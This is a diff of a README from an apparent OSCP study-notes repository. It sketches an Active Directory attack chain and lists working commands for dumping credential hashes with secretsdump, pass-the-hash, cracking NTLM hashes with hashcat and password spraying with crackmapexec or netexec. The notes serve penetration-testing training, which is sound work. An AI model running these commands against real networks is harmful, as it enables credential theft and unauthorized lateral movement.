AbdullahZuhair21/OSCP-Notes/README.md

 **Attacking AD**
 scenario: LLMNR -> raman hash -> crack -> sprayed the password -> found new login -> secretsdump -> local admin hashes -> respray the network with local accounts
+.          use netexec if creackmapexec langing
-.          secretsdump.py raman.local/machine1:to0or@10.10.16.14     (dump the hashes without metasploit)
+.          secretsdump.py raman.local/machine1:to0or@10.10.16.14 -use-vss    (dump the hashes without metasploit)
 .          secretsdump.py machine1:@10.10.16.14 -hashes <hash>     (dump the hashes without metasploit) .          hashcat -m <ntlm mode ex.
 1000> ntlm.txt rockyou.txt     (you only need to put the NTLM portion from NT:NTLM in the ntlm.txt file)
 .          crackmapexec smb <ip/CIDR> -u <user> -d raman.local -p <password>     (pass the password)